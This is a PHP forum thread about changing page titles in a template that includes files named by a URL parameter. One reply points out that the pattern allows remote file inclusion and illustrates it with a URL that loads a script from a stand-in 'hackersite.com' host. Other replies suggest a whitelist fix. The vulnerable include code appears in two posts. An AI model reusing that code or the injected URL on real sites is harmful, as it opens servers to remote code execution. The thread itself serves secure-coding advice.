SitePoint Sponsor

User Tag List

Results 1 to 7 of 7
  1. #1
    SitePoint Enthusiast
    Join Date
    Jun 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Making website dynamic with PHP

    I need to know how to change the title dynamically? Below is my template which I used for most of the websites I make.


    PHP Code:
    <html>
    <head>
    <body>
    Header / graphics here
    <?php
    if (!isset($page))
    {
    include (
    "home.php");

    }else{

    include (
    "$page.php"); 
    }
    Footer
    ?>

    </body>
    </head>
    </html>

    So basically the point of the above is to make links like this:

    www.domains.com/?page=home

    The only thing is the title wont change and I need to know how to dynamically change the title with different pages.

  2. #2
    SitePoint Zealot
    Join Date
    Mar 2002
    Location
    UK
    Posts
    150
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You could use the array fuction to insert the page title depending on the value of $page:

    PHP Code:
      <?php
      
      $pagetitle_array 
    = array(
      
      
    'home' => 'page title for home',
      
    'about' => 'page title for about us',
      
    'contact' => 'page title for contact us'
      
      
    );
      
      
    // Check $page exists
      
    $pagetitle = (empty($page)) ? 'Default title' $pagetitle_array[$page];
      
      
    ?>
      <html>
      <head> 
      <title><?=$pagetitle?></title>
    </head>
      <body> 
      Header / graphics here 
      <?php 
      
    if (!isset($page)) 
      { 
      include (
    "home.php"); 
       
      }else{ 
       
      include (
    "$page.php");  
      } 
      
    Footer 
      ?>
     
       
      </body> 
      </head> 
      </html>

  3. #3
    SitePoint Wizard silver trophy
    Join Date
    Mar 2006
    Posts
    6,132
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    include ("$page.php");


    have you ever thought about what might happen if someone decides do this?
    Code:
    http://yourwebsite.com/script.php?page=http://hackersite.com/malacious_script
    they just gained the ability to execute whatever php code they want to, using your webserver.

  4. #4
    SitePoint Enthusiast
    Join Date
    Jun 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by clamcrusher
    include ("$page.php");


    have you ever thought about what might happen if someone decides do this?
    Code:
    http://yourwebsite.com/script.php?page=http://hackersite.com/malacious_script
    they just gained the ability to execute whatever php code they want to, using your webserver.
    How do I secure this?

  5. #5
    SitePoint Wizard silver trophy
    Join Date
    Mar 2006
    Posts
    6,132
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    create a whitelist.
    a list of acceptable values. its very secure because its not possible to accept something you didnt specifically list.

    PHP Code:
    // using a switch
    switch ($_GET['page']) {
        case 
    'home':
            
    $file 'home.php';
            break;
        case 
    'contact':
            
    $file 'path/to/contact.php';
            break;
        case 
    'about':
            
    $file 'about.html';
            break;
        default:
            
    $file 'default.php';
    }

    include 
    $file;

    you could also use an array, which would be easier to use if you have many pages.

  6. #6
    SitePoint Wizard silver trophy
    Join Date
    Mar 2006
    Posts
    6,132
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    create a whitelist.
    a list of acceptable values. its very secure because its not possible to accept something you didnt specifically list.

    PHP Code:
    // using a switch
    switch ($_GET['page']) {
        case 
    'home':
            
    $file 'home.php';
            break;
        case 
    'contact':
            
    $file 'path/to/contact.php';
            
    // you could also put title in here
            
    $title 'contact us';
            break;
        case 
    'about':
            
    $file 'about.html';
            break;
        default:
            
    $file 'default.php';
    }





    include 
    $file
    you could also use an array, which would be easier to use if you have many pages.

  7. #7
    SitePoint Enthusiast duckax's Avatar
    Join Date
    Aug 2005
    Posts
    94
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I think another good way is to make sure that there isn't any http/ftp inside the included path. And make sure that the included file is PHP to prevent weird stuff from being read.

    In fact, since you have "home.php" and "$page.php" on different files, why not just link to them directly? You can include() your header and footer files from there instead.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •